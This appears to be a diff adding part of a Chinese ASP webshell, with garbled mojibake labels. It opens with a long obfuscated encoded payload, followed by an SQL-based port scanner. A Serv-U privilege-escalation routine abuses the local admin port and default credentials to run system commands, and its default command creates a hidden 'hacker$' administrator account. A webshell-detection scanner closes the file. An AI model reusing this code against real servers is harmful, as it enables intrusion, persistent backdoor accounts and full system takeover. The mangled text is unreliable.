nx%,'+UN+',Bjzqf{%,un,Bin%,}tGy}jY,Bxxfqh%,y}jy,Bju~y%,un,Bjrfs%yzusnA%'XWW�e'@uxgs+?UN%sfhXCuA'XWW�e'C,@jzwyBijqgfxni3ynrgzx36rwtk,BynrgzXst%,,Bstnyhf%,yxtu,Bitmyjr%,6rwtk,Bjrfs%rwtkA'XWW�e'Cu4A.IRH��ʹ�����˸�1���ϱȶ���1�ڶ˸�����ɨ����-����ɨ�ڶ�CuA'XWW�ekn%isj�e.'un'-rwtK3yxjzvjwBUN�ejxqj�e'635353<76'BUN�esjmy%''B.'un'-rwtK3yxjzvjw%kn�ekn%isj�e.'ywtu'-rwtK3yxjzvjwByxnQywtU�ejxqj�e'68;:1=:>891>=88188961:991>861:86156615=1:7187167'ByxnQywtU�esjmy%''B.'ywtu'-rwtK3yxjzvjw%kn�e555;<<<%B%yztjrnYyunwhX3wj{wjX?.-ywtUsfhX%gzx?gzx%isj?kn%isj�ekN%isJ�e~fwwFjmy%+%'CnqA'XwW�ejxqJ%�ey}jS�e.n-~fwwFjmy%+%'CnqA'XwW�e.~fwwFjmy-isztGZ%tY%5Bn%wtK�esjmY%.~fwwFjmy-~fwwFxN%kN�e.myfUjmy-ifjWljW3]x|B~fwwFjmy�e.'myfUjmy'-yxjzvjWBmyfUjmy�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%]x|%yjX�ey}jS%jrzxjW%wtwwJ%sT�esjmy%''CA.'myfUjmy'-yxjzvjW%kn�e'C4wmACrwtk4A'XwW�e'Csfux4A'XwW�e'C4wmAC,@jsts?~fquxni,Bjq~yx%tksNynijljwBin%sfuxA'XwW�e'CwgAC4wgA#.��������ϰ�-����Ŀ���ǰ��!%isnGajlfpsnQaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'Cu4ACuACwgAC4wgA#��������鼸��!%ysztHarzsJaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'Cu4ACuAC4wgA22222222222222222222WJ[T22222222222'XwW�e'CwgAC4wgA#�ڶ�UIZ������!%xywtUij|tqqFUIZa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#�ڶ�UN4UHY������!%xywtUij|tqqFUHYa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#XSI��!%wj{wjXjrfSa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#������Ĭ!%_XdNYZRdLJW1~f|jyfLyqzfkjIa#J7GJ::HI=98628KKF2H5G92>>J=2=76:;9F=!axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'Cu4ACuAC4wgA222222222ȷ׼���ǵ�֪��1�����Ķ���Ҫ��������2222222'XwW�e'CwgAC4wgA#��·UN����!%61IWT\IdLJW1wjyztWjqgfsJUNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#.����������-ѡɸUN4UHY����!%61IWT\IdLJW1xwjyqnK~ynwzhjXjqgfsJaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzhaRJYX^XaRQPM'XwW�e'CwgAC4wgA#���������չ�!%51_XdLJW1xj{nwIyjSijwfmXjqgfsJaxwjyjrfwfUawj{wjXsfrsfQaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#������Ĭֹ��!%51IWT\IdLJW1wj{wjXjwfmXtyzFaxwjyjrfwfUawj{wjXsfrsfQaxjhn{wjXayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#����)HUN�����������޻�������B71���л��û������з��޻�������B61ʡȱB5!%51IWT\IdLJW1xztr~stsfyhnwyxjwafxQaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'XwW�e'CwgAC4wgA#����¼�Ǵ���ʾ�Բ�!%61_XdLJW1jrfSwjxZyxfQ~fquxnI2ystIastltqsn\astnxwj[ysjwwzHax|tisn\ayktxtwhnRajwf|yktXaRQPM'XwW�e'CwgACwgACwgA%%C,%����snrifWȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'CsjiinmBju~y%5=Bj nx%,snriFWaRJYX^XaJSNMHFRdQFHTQd^JPM,Bjzqf{%snrifwBjrfs%yzusnA'XwW�e'CsnrifwBjrfs%ljWifjwBjzqf{%sjiinmBju~y%yzusnA'XwW�e'%%C,%����HS[ȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'CsjiinmBju~y%5=Bj nx%,iwt|xxfUa8HS[sn\aQWTajwf|yktXaZHPM,Bjzqf{%hs{Bjrfs%yzusnA'XwW�e'Chs{Bjrfs%hs{Bjzqf{%sjiinmBju~y%yzusnA'XwW�e'CwgACwgAC,%ȡ��%,Bjzqf{%ynrgzxBju~y%yzusnA%'XwW�e'C5=Bj nx%,jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM,Bjzqf{%myfUjmyBjrfs%yzusnA'XwW�e'CyhFjmyBjrfs%ljWifjwBjzqf{%sjiinmBju~y%yzusnA'XwW�e'CyxtuBitmyjr%rwtkA'XwW�e'C4wmA?ȡ��ֵ������ע'XwW?.-LJWifjW%gzx�egzX%isJ�e?'Cqt4A'%XWW�ekN%isJ�e'CwgA'%+%iwt|xxfUsnltQtyzf%+%'%?���ܻ��ʵ�¼�Ƕ���'%XWW�ekN%isJ�e'jxqfK'%XWW�ewfjqH3wwJ�esjmY%wwJ%kN�e.~jPxxfUsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%iwt|xxfUsnltQtyzf�e'CwgA'%+%jrfswjxZsnltQtyzf%+%'%?����ͳϵ��¼�Ƕ���'%XWW�e.~jPwjxZsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%jrfswjxZsnltQtyzf�ejxqJ�e'C4wgA����δ�ܹ�¼�Ƕ���ͳϵ'%XWW�esjmY%5%B%jqgfsJsnltQtyzFxn%kN�e.~jPjqgfsJsnltQtyzf%+%myfUsnltQtyzf-ifjWljW3]x|%B%jqgfsJsnltQtyzFxn�e'iwt|xxfUyqzfkjI'%B%~jPxxfUsnltQtyzf�e'jrfSwjxZyqzfkjI'%B%~jPwjxZsnltQtyzf�e'stltQsnriFtyzF'%B%~jPjqgfsJsnltQtyzf�e'astltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'%B%myfUsnltQtyzf�ekN%isJ�e'C4wgA'%+%ywtUrwjy%+%'%?�ڶ��������ǰ��'%XWW�ejxqJ%�e'C4wgA3���޵��ܾ��ѷ�����Ȩ�����%1�ڶ�������յ��÷���'XWW�e%sjmY%5%CA%wjgrzS3wwJ%wT%''%B%ywtUrwjy%kN�e'CqtAC4wmA¼�Ƕ��Լ��ڶ��������'%XWW�e.~jPywtUqfsnrwjy%+%myfUywtUqfsnrwjy-ifjWljW3]x|%B%ywtUrwjy�e'wjgrzSywtU'%B%~jPywtUqfsnrwjy�e'auhY2UIWaxstnyfyXsn\awj{wjX%qfsnrwjYaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'%B%myfUywtUqfsnrwjy�eiwt|xxfUsnltQtyzf%1jrfswjxZsnltQtyzf%1~jPjqgfsJsnltQtyzf%1jqgfsJsnltQtyzFxn%rnI�e~jPxxfUsnltQtyzf%1~jPwjxZsnltQtyzf%1myfUsnltQtyzf%rnI�eywtUrwjy%1~jPywtUqfsnrwjy%1myfUywtUqfsnrwjy%rnI�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%]x|%yjX�e'222222222222222222222222222222222222222222222222222222'%jynw\3jxstuxjW�e'CwgA'+ywtU\FU+'?Ϊ�ڶ�jwjm|~sFhUCnqA'%jynw\3jxstuxjW�e'jwjm|~sFhuװ�����ǻ�����ȷ��3ȡ����'BywtU\FU%sjmy%''BywtU\FU%kN�e.~jPjwjm|~sFhu-ifjWljW3mx\BywtU\FU�e'ywtUfyfIUNUHYarjyx~Xastnxwj[ysjwwzHajwjm|~sFhuahjysfr~XaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jPjwjm|~sFhu�e'CwgA'+ywtUrwjY+'?Ϊ�ڶ�jhn{wjX%qfsnrwjYCnqA'%jynw\3jxstuxjW�e'��������wj{wjX%x|tisn\Ϊ������ȷ��3ȡ������'BywtUrwjY%sjmY%''BywtUrwjY%kN�e.~jPrwjY-ifjWljW3mx\BywtUrwjY�e'wjgrzSywtUauhyaxiYai|uiwaxi\awj{wjX%qfsnrwjYaqtwystHayjXqtwystHysjwwzHaRJYX^XaJSNMHFRdQFHTQd^JPM'B~jPrwjY�e'CwgA'+ywtuysqY+'?�ڶ�yjsqjYCnqA'%jynw\3jxstuxjW�e'87'BysqY%sjmY%''BywtUysqY%kn�e.~jPyjsqjY-ifjWljW3mx\BywtUysqY�e'ywtUyjsqjYa536awj{wjXyjsqjYayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jpyjsqjY�e.'qqjmX3yunwhX\'-yhjogTjyfjwH3wj{wjX%B%mx|%yjX�e'C6Bj nx%wmACwgAb��̽�ڶ�����`CwgACwgA'%jynw\3jxstuxjW�ey}jS%jrzxjW%wtwwJ%sT?.-tksNqfsnrwjYyjl%gzx"))
+Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub
+Select Case Action
+Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+   f=left(f,2)
+end if
+ftpport = 21
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+    set a=session("a")
+    set b=session("b")
+    set c=session("c")
+    a.abort
+    Set a = Nothing
+    b.abort
+    Set b = Nothing
+    c.abort
+    Set c = Nothing
+RRS"<center><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP�� 6.4</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"    <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"  </tr>"
+RRS"  <tr align='center' valign='middle'>"
+RRS"    <td>�����</td>"
+RRS"    <td><input name='c' type='text' id='c' value='cmd /c net user hacker$ hacker /add & net localgroup administrators hacker$ /add' size='50'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"  </tr>"
+RRS" <tr align='center' valign='middle'>"
+RRS"    <td>˵������</td>"
+RRS"    <td><input name='ccc' type='text' id='ccc' value='���滻��:cmd /c D:\web\���ϴ���ľ��.exe Ҳ������VBS' size='50'></td>"
+RRS"  </tr>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+    err.clear
+    set f=Server.CreateObject("Scripting.FileSystemObject")
+    if err.number>0 then
+	gpath="c:"
+        exit function
+    end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+
+  Case "kmuma"
+	dim Report
+	if request.QueryString("act")<>"scan" then
+	  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+		RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+		RRS "<form action=""?Action=kmuma&act=scan"" method=""post"" name=""form1"">"
+		RRS "<p><b>������Ҫ����·����</b>"
+		RRS "<input name=""path"" type=""text"" style=""border:1px solid #999"" value=""."" size=""30"" /> �\����վ��Ŀ¼����.��Ϊ������Ŀ¼<br><br>"
+		RRS "��Ҫ��ʲô: <input class=c name=""radiobutton"" type=""radio"" value=""sws"" onClick=""document.getElementById('showFile1').style.display='none'"" checked>��ASP ��"
+		RRS "<input class=c type=""radio"" name=""radiobutton"" value=""sf"" onClick=""document.getElementById('showFile1').style.display=''"">������������֮�ļ�<br>"
+		RRS "<br /><div id=""showFile1"" style=""display:none"">"
+		RRS "&nbsp;&nbsp;�������ݣ�<input name=""Search_Content"" type=""text"" id=""Search_Content"" style=""border:1px solid #999"" size=""20"">"
+		RRS " Ҫ���ҵ��ַ����������ֻ�������ڼ��<br />"
+		RRS "&nbsp;&nbsp;�޸����ڣ�<input name=""Search_Date"" type=""text"" style=""border:1px solid #999"" value="""&Left(Now(),InStr(now()," ")-1)&""" size=""20""> ���������;����������������д <a href=""#"" onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
+		RRS "&nbsp;&nbsp;�ļ����ͣ�<input name=""Search_FileExt"" type=""text"" style=""border:1px solid #999"" value=""*"" size=""20""> ����֮����,������*��ʾ��������<br /><br /></div>"
+		RRS "<input type=""submit"" value="" ��ʼɨ�� "" style=""padding:2px 2px 0px 2px;margin:4px;"" />"
+		RRS "</form>"
+	else
+		if request.Form("path")="" then
+			RRS("·������Ϊ��")
+			response.End()
+		end if
+		if request.Form("path")="\" then
+			TmpPath = Server.MapPath("\")
+		elseif request.Form("path")="." then
+			TmpPath = Server.MapPath(".")
+		else
+			TmpPath = request.Form("path")
+		end if
+		
+		timer1 = timer
+		Sun = 0
+		SumFiles = 0
+		SumFolders = 1
+		If request.Form("radiobutton") = "sws" Then
+			DimFileExt = "asp,cer,asa,cdx"
+			Call ShowAllFile(TmpPath)
+		Else
+			If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
+				RRS("������������ȫ<br><br><a href='javascript:history.go(-1);'>�뷵����������</a>")
+				response.End()
+			End If
+			DimFileExt = request.Form("Search_fileExt")
+			Call ShowAllFile2(TmpPath)
+		End If
+RRS "<table width=""100%"" border=""0"" cellpadding=""0"" cellspacing=""0"" style='font-size:12px'>"
+RRS "<tr><th>Scan WebShell</tr>"
+RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-size:12px"">"
+RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid #89441f;padding:4px;display:none""></div>"
+RRS "ɨ����ϣ�һ������ļ���<font color=""#FF0000"">"&SumFolders&"</font>�����ļ�<font color=""#FF0000"">"&SumFiles&"</font>�������ֿ��ɵ�<font color=""#FF0000"">"&Sun&"</font>��"
+RRS "<table width=""100%"" border=""1"" cellpadding=""0"" cellspacing=""8"" bordercolor=""#999999"" style=""font-size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
+If request.Form("radiobutton") = "sws" Then
+	RRS "<td width=""20%"">�ļ����·��</td>"
+	RRS "<td width=""20%"">������</td>"
+	RRS "<td width=""40%"">����</td>"
+	RRS "<td width=""20%"">����/�޸�ʱ��</td>"
+else   
+	RRS "<td width=""50%"">�ļ����·��</td>"
+	RRS "<td width=""25%"">�ļ�����ʱ��</td>"
+	RRS "<td width=""25%"">�޸�ʱ��</td>"
+end if
+	RRS "</tr>"
+	RRS Report
+	RRS "<br/></table>"
+timer2 = timer
+thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
+RRS "<br><font style='font-size:12px'>��ҳִ�й�����"&thetime&"����</font>"
+	end if
+Sub ShowAllFile(Path)
+	Set F1SO = CreateObject("Scripting.FileSystemObject")
+	if not F1SO.FolderExists(path) then exit sub
+	Set f = F1SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call ScanFile(Path&Temp&"\"&myfile.name, "")
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F1SO = Nothing
+End Sub
+Sub ScanFile(FilePath, InFile)
+Server.ScriptTimeout=999999999
+	If InFile <> "" Then
+		Infiles = "<font color=red>���ļ���<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>�ļ�����ִ��</font>"
+	End If
+	Set FSO1s = CreateObject("Scripting.FileSystemObject")
+	on error resume next
+	set ofile = FSO1s.OpenTextFile(FilePath)
+	filetxt = Lcase(ofile.readall())
+	If err Then Exit Sub end if
+	if len(filetxt)>0 then
+		filetxt = vbcrlf & filetxt
+		temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+			If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ���� clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>Σ�������һ�㱻ASPľ������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End if
+			If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ���� clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>Σ�������һ�㱻ASPľ������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			Set regEx = New RegExp
+			regEx.IgnoreCase = True
+			regEx.Global = True
+			regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>�ƺ��ű���������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\bEv"&"al\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()��������ִ������ASP����<br>����javascript������Ҳ����ʹ�ã��п������󱨡�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "[^.]\bExe"&"cute\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()��������ִ������ASP����</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.(Open|Create)TextFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>ʹ����FSO��CreateTextFile|OpenTextFile��д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.SaveToFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>ʹ����Stream��SaveToFile����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.Save\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>ʹ����XMLHTTP��Save����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]\)"
+		If regEx.Test(filetxt) Then
+			Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>���ܸ��ټ��Server.e"&"xecute()����ִ�е��ļ���</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+			Sun = Sun + 1
+		End If
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set XregEx = New RegExp
+		XregEx.IgnoreCase = True
+		XregEx.Global = True
